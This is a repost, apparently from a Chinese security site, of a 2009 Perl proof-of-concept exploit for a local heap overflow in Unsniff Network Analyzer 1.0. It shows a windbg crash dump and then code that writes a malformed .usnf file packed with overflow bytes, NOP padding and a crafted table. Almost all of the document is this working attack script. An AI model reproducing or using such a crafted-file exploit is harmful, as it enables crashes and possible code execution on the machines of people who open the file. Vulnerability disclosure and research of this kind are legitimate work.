首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
来源:http://www.zeroscience.org/ 作者:LiquidWorm 发布时间:2009-04-07  
#!/usr/bin/perl
#
# Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
#
# Summary: Dont just look at hex dumps and protocol trees. With Unsniff
# Network Analyzer, you can view network traffic at various levels of detail.
# View high level objects like images, video, HTML pages, VOIP calls, drill
# down to individual TCP sessions, then onto reassembled PDUs, then finally
# to individual packets. All this functionality is packed in a cool graphical
# interface.
#
# Product web page: http://www.unleashnetworks.com/unsniff/unsniff-2.html
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
# ----------------------------windbg outpootz-------------------------------
#
# HEAP[usnfctr.exe]: Invalid allocation size - 88888880 (exceeded 7ffdefff)
# (998.d08): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=22222220 edx=00000000 esi=01248c58 edi=00000000
# eip=018468d1 esp=0012c754 ebp=0012c7dc iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
# vocore2u!CatFactory_SysLASwizzle+0x24602:
# 018468d1 f3ab            rep stos dword ptr es:[edi]
# Missing image name, possible paged-out or corrupt data.
#
# --------------------------------------------------------------------------
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 06.04.2009
#





         $a="\x01\x00\x00\x00\x11".
"\x27\x00\x00\x56\x00\x4F\x00\x44".
    "\x00\x41".       "\x00".     "\x54\x00".
   "\x42\x00".       "\x53".      "\x00\x31".
  "\x00". "\x00".     "\x00".   "\x00". "\x00".
  "\x00\x00".       "\x00".       "\x00\x00".
  "\x00\x00".       "\x00".       "\x00\x00".
  "\x00\x00".     "\x00\x00".       "\x00\x00".
   "\x00\x20".    "\x00".  "\x00".    "\x00\x10".
    "\x00\x00".  "\x00".    "\x40".  "\x00\x00".
     "\x00\x40\x04".           "\x00\x02\x00".
      "\x40\x00";$b="\x4A"x300000;$c="\0x0D".
         "\0x0A"x10;$d="\x90"x20;$e="\x00".
      "\x00".
   #############
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x2C\x24\x00\x00\x2A\x24".
"\x00\x00". "\x29\x24\x00\x00\x27\x24". "\x00\x00".
"\x26\x24". "\x00\x00\x24\x24\x00\x00". "\x23\x24".
"\x00\x00". "\x21\x24\x00\x00\x20\x24". "\x00\x00".
"\x1E\x24". "\x00\x00\x1D\x24\x00\x00". "\x1B\x24".
"\x00\x00". "\x1A\x24\x00\x00\x18\x24". "\x00\x00".
"\x17\x24". "\x00\x00\x15\x24\x00\x00". "\x14\x24".
"\x00\x00". "\x12\x24\x00\x00\x11\x24". "\x00\x00".
"\x0F\x24". "\x00\x00\x0E\x24\x00\x00". "\x0C\x24".
"\x00\x00". "\x0B\x24\x00\x00\x09\x24". "\x00\x00".
"\x08\x24". "\x00\x00\x06\x24\x00\x00". "\x05\x24".
"\x00\x00". "\x03\x24\x00\x00\x02\x24". "\x00\x00".
     "\x00\x24\x00\x00\xFF\x23".
     "\x00\x00\xFD\x23\x00\x00".
     "\xFC\x23\x00\x00\xFA\x23".
     "\x00\x00\xF9\x23\x00\x00".
"\xF7\x23\x00\x00\xF6\x23\x00\x00".
     "\xF4\x23\x00\x00\xF3\x23\x00\x00\xF1\x23".
       "\x00\x00\xF0\x23\x00\x00\xEE\x23\x00".
      "\x00\xED\x23\x00\x00";
     $file="Denny_Crane.usnf";
open j, ">./$file";
    ###########################
###################
   #-#-#-##-#-#-#
       #t00t#

print j $a.$b.$c.$d.$b.$c.$d.$e;
close j;sleep 1;print "\nYeah.\n";
print "File $file successfully landed!\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Pirelli Discus DRG A225 wifi r
·Baby FTP server version 1.x re
·UltraISO <= 9.3.3.2685 .ui Off
·Family Connections CMS <= 1.8.
·iDB 0.2.5pa SVN 243 (skin) Loc
·Lanius CMS <= 0.5.2 Remote Arb
·Mozilla Firefox XSL Parsing Re
·XBMC 8.10 (HEAD) Remote Buffer
·XBMC 8.10 GET Request Remote B
·SASPCMS 0.9 Multiple Remote Vu
·Amaya 11.1 XHTML Parser Remote
·peterConnects Web Server Trave
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved